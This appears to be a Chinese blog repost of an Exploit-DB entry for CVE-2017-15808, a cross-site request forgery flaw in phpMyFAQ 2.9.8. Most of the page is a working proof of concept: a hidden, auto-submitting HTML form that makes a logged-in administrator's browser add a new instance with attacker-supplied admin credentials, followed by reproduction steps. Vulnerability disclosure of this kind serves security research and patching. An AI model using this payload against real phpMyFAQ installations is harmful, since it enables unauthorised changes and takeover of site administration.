phpMyFAQ 2.9.8 跨站请求伪造漏洞详情与利用方法

本文详细描述了phpMyFAQ 2.9.8版本中存在的一个跨站请求伪造(CSRF)漏洞(CVE-2017-15808)。通过构造特定的HTML表单,攻击者可以在管理员不知情的情况下执行添加新实例等敏感操作。

phpMyFAQ 2.9.8 - 跨站请求伪造(CSRF)

EDB-ID: 52455

CVE: 2017-15808

EDB 已验证:

作者: CodeSecLab

类型: webapps

平台: PHP

发布日期: 2025-12-03

漏洞应用:


漏洞标题:phpMyFAQ 2.9.8 - 跨站请求伪造(CSRF)

日期:2025-11-25

漏洞作者:CodeSecLab

厂商主页:https://github.com/thorsten/phpMyFAQ/

软件链接:https://github.com/thorsten/phpMyFAQ/

版本:2.9.8

测试平台:Windows 10

CVE:CVE-2017-15808

概念验证(PoC)代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
<html>
  <body>
    <form action="http://phpmyfaq/admin/index.php" method="GET">
      <input type="hidden" name="action" value="ajax">
      <input type="hidden" name="ajax" value="config">
      <input type="hidden" name="ajaxaction" value="add_instance">
      <input type="hidden" name="url" value="malicious">
      <input type="hidden" name="instance" value="malicious_instance">
      <input type="hidden" name="comment" value="CSRF Test">
      <input type="hidden" name="email" value="attacker@example.com">
      <input type="hidden" name="admin" value="attacker">
      <input type="hidden" name="password" value="password123">
      <input type="submit" value="Submit request">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

复现步骤:

  1. 将上述代码保存为 poc.html
  2. 登录phpmyfaq后台,在同一浏览器中打开该文件。
  3. 漏洞将被触发。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计